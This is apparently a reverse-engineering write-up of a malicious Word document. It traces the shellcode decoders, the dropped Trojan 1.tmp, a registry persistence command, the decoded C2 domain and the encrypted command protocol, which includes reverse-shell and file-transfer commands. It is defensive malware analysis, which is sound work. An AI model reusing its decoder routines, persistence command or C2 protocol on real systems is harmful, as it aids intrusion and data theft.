National situation.doc Analysis

Today I will analyze the following file:

File Name:  National situation.doc
File Size:  61184 bytes
MD5:        9476ed0a007ba332b7da0a657b1608bd
SHA1:       a7a4802387c2f885a5f0235542c5d3b377335b5b

• This file was posted at http://contagiodump.blogspot.com and downloaded here.
• At file-offset 0×3330 is the beginning of the shellcode.
• The shellcode starts with a little routine that decodes the rest of the shellcode by rotate left 4 method:

00146E44     57                 PUSH EDI
00146E45     5E                 POP ESI
00146E46     90                 NOP
00146E47     33C9               XOR ECX, ECX
00146E49     66:B9 0901         MOV CX, 109
00146E4D     B8 1E000000        MOV EAX, 1E
00146E52     03F0               ADD ESI, EAX
00146E54     8BFE               MOV EDI, ESI
00146E56     8BD6               MOV EDX, ESI
00146E58     AC                 LODS BYTE PTR DS:[ESI]
00146E59     C0C0 04            ROL AL, 4
00146E5C     AA                 STOS BYTE PTR ES:[EDI]
00146E5D     49                 DEC ECX
00146E5E   ^ 75 F8              JNZ SHORT 00146E58
00146E60   - FFE2               JMP EDX

• The decoded shellcode, enumerates all the open file handles and searches for one that matches the size of the Word document (i.e. 0xEF00 or 61,184 bytes).
• Once it finds the correct file handle, it sets a file pointer at file-offset 0x4E00.
• It reads 0x7D0 bytes from that point, and then executes the data that it read (i.e. the data we read is 2nd stage shellcode):

00880000     33C9               XOR ECX, ECX
00880002     66:B9 F104         MOV CX, 4F1
00880006     90                 NOP
00880007     8B7D F8            MOV EDI, DWORD PTR SS:[EBP-8]
0088000A     66:83C7 1A         ADD DI, 1A
0088000E     57                 PUSH EDI
0088000F     8BF7               MOV ESI, EDI
00880011     AC                 LODS BYTE PTR DS:[ESI]
00880012     C0C0 04            ROL AL, 4
00880015     AA                 STOS BYTE PTR ES:[EDI]
00880016     49                 DEC ECX
00880017   ^ 75 F8              JNZ SHORT 00880011
00880019     C3                 RETN

• Just as before, this shellcode starts with decoding the rest of the shellcode that follows it by a rotate left 4 bits.
• This decoded shellocode creates a file:
  • C:\DOCUME~1\username\LOCALS~1\Temp\1.tmp
  • Sets a pointer at file-offset 0x52F1 of the original DOC file, and reads 0x3C00 bytes from there.
  • This data is decrypted using a 256-byte key that starts with the lower byte of the length of the data: 0x00 (because the length is 0x3C00) and is decremented by one.  So, we have a 256 byte XOR key 0xFF – 0×00.
• After this ox3C00 bytes of data is decoded in this manner we end up with something that looks like this:

• As you can see we almost have an executable, but there is more de-obfuscation that will have to occur.
• That final de-obfuscation routine is shown below.  It essentially XORs four bytes with 0×77656972, then it skips four bytes.  This is equivalent to XOR-ing with 0×7765697200000000.
• The shellcode responsible for this is shown below:

00880153     8B55 EC            MOV EDX, DWORD PTR SS:[EBP-14]
00880156     83C2 08            ADD EDX, 8
00880159     8955 EC            MOV DWORD PTR SS:[EBP-14], EDX
0088015C     8B45 FC            MOV EAX, DWORD PTR SS:[EBP-4]
0088015F     8B4D EC            MOV ECX, DWORD PTR SS:[EBP-14]
00880162     3B48 50            CMP ECX, DWORD PTR DS:[EAX+50]
00880165     7D 17              JGE SHORT 0088017E
00880167     8B55 F8            MOV EDX, DWORD PTR SS:[EBP-8]
0088016A     0355 EC            ADD EDX, DWORD PTR SS:[EBP-14]
0088016D     8B02               MOV EAX, DWORD PTR DS:[EDX]
0088016F     35 72696577        XOR EAX, 77656972
00880174     8B4D F8            MOV ECX, DWORD PTR SS:[EBP-8]
00880177     034D EC            ADD ECX, DWORD PTR SS:[EBP-14]
0088017A     8901               MOV DWORD PTR DS:[ECX], EAX
0088017C   ^ EB D5              JMP SHORT 00880153

• So, our fully decrypted file has the following characteristics:

File Name:  1.tmp
File Size:  15360 bytes
MD5:        c303e2d790c45bb0e05445120a8af920
SHA1:       cf020c87fb3059a48ae0622960377a0182d588b9
PE Time:    0x4D30024E [Fri Jan 14 07:59:10 2011 UTC]
AV:         14/41 (34.1%) VirusTotal

• The shellcode then executes file 1.tmp.
• The shellcode then creates file:
  • C:\DOCUME~1\username\LOCALS~1\Temp\National situation.doc.
• and decrypts the data for this decoy file from the original DOC using a 256-byte key that starts with the lower byte of the size of the decoy doc.
• This decoy document has the following characteristics:

File Name:  National situation.doc
File Size:  24576 bytes
MD5:        ff737870ded2c680a573143c88d322bd
SHA1:       ee3ec3a8ee1c261a2a3c35b0638b263cae88c79f

• The shellcode opens the following registry key:
  • Software\Microsoft\Office\11.0\Word\Resiliency
  • and tries to delete “StartupItems”
  • I am not sure what the purpose this serves.  Please let me know if you know.
  • The decoy DOC file is then opened.

PAYLOAD ANALYSIS – 1.TMP

File Name:  1.tmp
File Size:  15360 bytes
MD5:        c303e2d790c45bb0e05445120a8af920
SHA1:       cf020c87fb3059a48ae0622960377a0182d588b9
PE Time:    0x4D30024E [Fri Jan 14 07:59:10 2011 UTC]
AV:         14/41 (34.1%) VirusTotal

• When you execute this Trojan, it does the following:
  • Creates file: C:\WINDOWS\ACTIVE.ini and writes 4 bytes in it (0×00000000)
  • It then calls CreateProcessA to launch a second instance of 1.tmp.
  • It tries to delete the following registry, which does not exist in my system:
    • Software\Microsoft\Active Setup\Installed Components\{A0XC6A98-A14C-J35H-46UD-F5AR862J2AH5}
  • Then this first instance of the Trojan exits.
• The new instance of the Trojan opens ACTIVE.ini and reads the first 4 bytes (DWORD).  This DWORD represents an integer.  If the value is 0, then the Trojan writes 1 (0×01000000) in the file.  If the value is 1, then the Trojan writes 0 back in the file.  This value appears to be used a flag.
  • If value = 0, then start communicating with the C2 node.  Write 1 back into ACTIVE.ini.
  • If value = 1, then starts a second instance of 1.tmp, delete the ActivX component listed above, and write 0 back into ACTIVE.ini, and exit.
• The Trojan then opens the following registry key and adds 1.tmp in the list:
  • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
    • C:\Documents and Settings\username\Local Settings\Temp\1.tmp
• Starting at file-offset 0x36C8 of 1.tmp there is an encoded string that contains the domain name to be resolved:

• The Trojan then decodes the highlighted data (blue) above using this simple algorithm:

00402226  |> /8A0C32                   /MOV CL, BYTE PTR DS:[EDX+ESI]
00402229  |. |8AC2                     |MOV AL, DL
0040222B  |. |04 36                    |ADD AL, 36
0040222D  |. |8BFE                     |MOV EDI, ESI
0040222F  |. |32C8                     |XOR CL, AL
00402231  |. |33C0                     |XOR EAX, EAX
00402233  |. |880C32                   |MOV BYTE PTR DS:[EDX+ESI], CL
00402236  |. |83C9 FF                  |OR ECX, FFFFFFFF
00402239  |. |42                       |INC EDX
0040223A  |. |F2:AE                    |REPNE SCAS BYTE PTR ES:[EDI]
0040223C  |. |F7D1                     |NOT ECX
0040223E  |. |49                       |DEC ECX
0040223F  |. |3BD1                     |CMP EDX, ECX
00402241  |.^\72 E3                    \JB SHORT 1.00402226

• This algorithm basically XORs each byte of the encoded data with a key that starts with 0×36 and is incremented by one.
• The data decodes to: googleupdate2011.dyndns.org.
• The Trojan then makes a call to ADVAPI32.AllocateAndInitializeSid passing GroupID 544 (i.e. the local admin group) as one of the parameters.  This is a way for the Trojan to check whether it is running with Admin privileges.

00402A59  |.  51                 PUSH ECX                          ; /Arg11
00402A5A  |.  6A 00              PUSH 0                            ; |Arg10 = 00000000
00402A5C  |.  6A 00              PUSH 0                            ; |Arg9 = 00000000
00402A5E  |.  6A 00              PUSH 0                            ; |Arg8 = 00000000
00402A60  |.  6A 00              PUSH 0                            ; |Arg7 = 00000000
00402A62  |.  6A 00              PUSH 0                            ; |Arg6 = 00000000
00402A64  |.  6A 00              PUSH 0                            ; |Arg5 = 00000000
00402A66  |.  68 20020000        PUSH 220                          ; |Arg4 = 00000220
00402A6B  |.  6A 20              PUSH 20                           ; |Arg3 = 00000020
00402A6D  |.  6A 02              PUSH 2                            ; |Arg2 = 00000002
00402A6F  |.  52                 PUSH EDX                          ; |Arg1
00402A70  |.  FF15 20404000      CALL DWORD PTR DS:[<&ADVAPI32.All>; \AllocateAndInitializeSid

• If the Trojan is running with the credentials of a privileged account then it runs the following command:
  • cmd /c reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{A0XC6A98-A14C-J35H-46UD-F5AR862J2AH5}” /v StubPath /t REG_SZ /d “C:\Documents and Settings\username\Local Settings\Temp\1.tmp” /f”

COMMUNICATION PROTOCOL

• This Trojan then connects to googleupdate2011.dyndns.org over TCP port 443 (not SSL), and first performs a simple key exchange with the C2 node.
  • The Trojan first sends 8 bytes of random data to the C2 node.
  • The C2 node replies with 8 bytes of (presumably) random data.
  • These two sets of 8 bytes are then XORed with each other to create an 8-byte XOR key that is used to encrypt the data during communiciation.
  • This key is continually rotated, (i.e. it is not restarted from the beginning after each transmission).  If this is confusing, it will make more sense further down.

• Once the key is exchanged, the Trojan replies with a one byte transmission (XOR-ed with the 1st byte of the XOR key).  Once decrypted, this byte has value 0×01.
• The C2 node is then expected to send a 1 byte command to the Trojan.
• Valid commands are 0×00 – 0×06, however if you decrypt them on the wire they will be incremented by one (0×01 – 0×07) because they are decremented by the Trojan before being evaluated (ref. 0x00402BC9).  So, to keep things simple I will refer to the command by the number that would appear on the wire.

• As an example, I will illustrate the key exchange and the processing of the first command 0×01.
• The data on the wire look like this:

Trojan:
00000000  6b ef 40 56 c9 5e c2 5c                          k.@V.^.\ 
C2 node:
00000000  31 31 31 31 31 31 31 0a                          1111111. 
Trojan:
00000008  5b                                               [
C2 Node:
00000008  5b                                               .
Trojan:
00000009  de 72 62 f9 6d f1 56 56  f7 fd b4 18 af 5b 57 3e .rb.m.VV .....[W>
00000019  de b1 90 c7 3c 96 24 2c  b7 12 02 d8 3f 92 35 31 ....<.$, ....?.51
00000029  fe 42 67 8e 06 90 22 33  b3 71 12 8b 0a 81 38 3b .Bg..."3 .q....8;
00000039  b3 14 67                                         ..g

• KEY EXCHANGE:
  • So, the Trojan started with the following 8 random bytes: 6b ef 40 56 c9 5e c2 5c.
  • I (the C2 node) replied with my own eigth bytes: 31 31 31 31 31 31 31 0a.
  • Both, sides calculate the 8 byte XOR key: 6b ef 40 56 c9 5e c2 5c XOR 31 31 31 31 31 31 31 0a gives us the following key: 5A DE 71 67 F8 6F F3 56

• The Trojan replies with 0x5B (which is 0×01 because 0x5B XOR 0x5A = 0×01).  This may be a way for the Trojan to tell the C2 node that it is ready to receive commands.
• I sent the 0×01 command (encrytped 0x5B).
• The Trojan replies with:

Trojan:
00000009  de 72 62 f9 6d f1 56 56  f7 fd b4 18 af 5b 57 3e .rb.m.VV .....[W>
00000019  de b1 90 c7 3c 96 24 2c  b7 12 02 d8 3f 92 35 31 ....<.$, ....?.51
00000029  fe 42 67 8e 06 90 22 33  b3 71 12 8b 0a 81 38 3b .Bg..."3 .q....8;
00000039  b3 14 67                                         ..g

• The C2 node will decrypt this data starting with the second byte of the key since the first byte was already used for the command.  So, our key will look like this: DE 71 67 F8 6F F3 56 5A, and repeat for the length of the data.

• The data that the Trojan sends to the C2 node contains some header data and system information (0xC0A80164 is the IP address of the victim 192.168.1.100).  Here is the decrypted version:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   00 03 05 01 02 02 00 0C  29 8C D3 E0 C0 A8 01 64           )ŒÓàÀ¨ d
00000010   00 C0 F7 3F 53 65 72 76  69 63 65 20 50 61 63 6B    À÷?Service Pack
00000020   20 33 00 76 69 63 74 69  6D 00 75 73 65 72 6E 61    3 victim userna
00000030   6D 65 00                                           me 

• Here is a list of all the commands this Trojan understands and their purpose (again these numbers are what you would see on the wire after you decrypt the traffic)
  • COMMAND 0×01 – System Information
  • COMMAND 0×02 – Close connection/sleep
  • COMMAND 0×03 – Restart the connection
  • COMMAND 0×04 – Executes file microupdater.exe (same location as 1.tmp)
  • COMMAND 0×05 – Exit
  • COMMAND 0×06 – Reverse shell (cmd.exe is copied into C:\WINDOWS\alg.exe and executed.
  • COMMAND 0×07 – File system transactions
    • The Trojan creates a second connection to the C2 node and accepts the following commands over this new connection.
      • 0×01 – Directory listing
      • 0×02 – File move
      • 0×03 – File download (to victim)
      • 0×04 – File upload (to C2 node)
      • 0×05 – Execute a file
      • 0×06 – Delete a file